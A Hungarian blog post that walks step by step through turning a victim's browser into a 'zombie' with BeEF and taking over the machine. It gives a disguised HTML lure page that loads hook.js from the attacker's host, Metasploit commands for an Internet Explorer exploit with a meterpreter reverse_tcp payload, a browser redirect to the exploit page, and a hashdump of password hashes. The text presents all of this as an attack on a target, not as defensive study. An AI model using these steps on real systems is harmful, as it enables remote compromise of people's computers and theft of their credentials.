2013. október 30., szerda

A védtelen böngészők

Most arról fogok írni, hogy milyen könnyen lehet egy védtelen böngészőből zombi böngészőt csinálni, és ilyenkor azt fogja csinálni amire utasítjuk. Metasploit segítségével csinálhatunk egy oldalt amit ha megnéz a célpont akkor az exploit vissza fog nyitni hozzánk és akkor bent vagyunk a gépében. :)
Most a BeEF project nevű eszközt fogjuk használni ami pont erre való, hogy zombit csináljunk a böngészőkből. Elég sok mindent tud a kicsike például:
Átirányítani egy másik webhelyre, sütiket lopni szóval elég sok mindent meg tud csinálni. :)
Először fel kell telepíteni, Kali-n alapból van. :)


Indítsuk el:
service beef start
És a beállított porton hozzá lehet férni a kezelőfelülethez. :)
Nekem a 3000-es porton fut...
Szóval akkor ha el van indítva, nyisd meg a böngésződet és írd be:
http://ipcímed:port/ui/panel
Felhasználónév beef a jelszó ugyanaz mint a felhasználó. :)
Egyébként ha elindítottad a beef-et ki fogja listázni milyen porton fut meg minden így: :)
A kezelőfelület így néz ki:
Oldalt írja, hogy milyen böngészők jöttek be stb. Most azt fogom megmutatni, hogy mi lesz ha valaki gépén lefut a hook.js ami zombi böngészőt csinál az adott böngészőből. :)
De előtte írjunk egy kis HTML-t ami majd lefuttatja :)
Mondjuk, hogy ne tűnjön olyan gyanúsnak tegyünk be egy képet háttérnek. :)
És mondjuk írjunk a képre valamit példa:
<html>
<body background="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAs716A4CM-k61Mc1SW9cfn7X5YkGgBdVU9PWetFN5TnN0Ml6LLk6jO6pfUwV6xiNb7PAWTtEPj-TSp_bQbF0YBjiTd4wr6hBr4CcaesHapkUON-vExkggU3waTuQjV-fYL0KXawnzo6b3/s1600/AkshayKumar.jpg"><script src="http://ip:port/hook.js"></script>
</body>
</html>
És ilyenkor várni kell picit míg lefut a szkript ha megnézi az áldozat...
Kell nekünk egy webszerver ahova feltesszük a scriptet, megnézi az áldozat és aztán csinálhatjuk a dolgokat.  :)
És valamikor a beef meg tudja határozni, hogy milyen böngészővel nézte meg
pl firefox stb...
Na akkor ha megvan ez az egész akkor küldjük el az áldozatnak és ha megnézte kell várnia kb 10 mp-t hogy vissza tudjon nyitni hozzánk
Nekem meghatározta, hogy internet explorerrel jött fel a célpont. Most fogjunk egy jó kis IE exploitot. :)
msfconsole
use windows/browser/ms10_018_ie_behaviors
set lhost ip
set payload windows/meterpreter/reverse_tcp
set uripath /
exploit
Ha már meghatározta a böngésző típusát át lehet irányítani egy másik helyre pl. az exploit oldalára. :)
Katt a célpont-ra ami kijött, katt a command fülre nyisd le a browser opciót aztán a hooked domain opciót is. Aztán katt a redirect browser-re és írd be a webcímet pl: http://192.168.88.258/ mert ugye az uripathot /-re állitottuk és csak 1 / kell az ip után :D
Ha beírtad hogy hova irányítsa át akkor kattints az execute gombra. :)
Vársz egy kicsit aztán mikor megnyílik a session a metasploitban beírod hogy sessions -i 1.
És bent is vagyunk. Írjuk be pl. hogy hashdump és ki is dobta a rendszer felhasználók jelszó hasheit :D
Szóval ez a BeEF cucc nem csak windowsból tud zombi büngészőt csinálni hanem linuxon is és akár OS X-en is. :)
Ennyi lenne remélem érthető volt kösz, hogy elolvastad. :)